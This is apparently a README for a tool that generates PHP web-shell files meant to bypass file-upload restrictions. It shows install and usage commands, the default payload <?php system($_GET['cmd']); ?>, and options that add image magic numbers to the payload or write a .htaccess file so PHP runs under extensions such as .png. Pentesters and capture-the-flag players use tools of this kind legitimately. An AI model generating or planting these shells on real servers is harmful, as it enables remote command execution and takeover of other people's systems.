Generate some payload to bypass restriction when you perform a file upload
Generate in Payloads/ all extension for PHP
git clone https://github.com/LighTend3r/generate-file-upload.git
cd ./generate-file-upload
To install it, write the command above
python3 upfile.py -h
If you want help to understand the programme
python3 upfile.py
Generate all extension in PHP
python3 upfile.py -b
Generate all bypass for PHP
python3 upfile.py -n test -p test -ext php
Generate file named test.php which contain test
python3 upfile.py -b -m png
Generate all files bypass for PHP, which contain magicNumber + payload
python3 upfile.py -ext png -ht png
Generate .htaccess which allow execution of php with extension .png and create paylaod.png
Default name : payload
Default file : PHP
Default payload : <?php system($_GET["cmd"]); ?>
usage: upfile.py [-h] [-d] [-p <payload>] [-f {php}] [-ext <ext>] [-b] [-n <name>] [-m {png,jpg,pdf}] [-ht <ext>]
Generate some payload to bypass restriction when you perform a file upload
options:
-h, --help show this help message and exit
-d, --debug Show debugging to see the process
-p <payload>, --payload <payload>
The payload in the files
-f {php}, --file {php}
The type of the files
-ext <ext>, --extension <ext>
Generate the payload with specific extension
-b, --bypass Generate some payload to bypass the restriction
-n <name>, --name <name>
Name of the file
-m {png,jpg,pdf}, --magic {png,jpg,pdf}
Magic Header, add the magics numbers before the payload
-ht <ext>, --htaccess <ext>
Creates in addition a .htaccess file, which allow execution of php whith extension that you
have chosen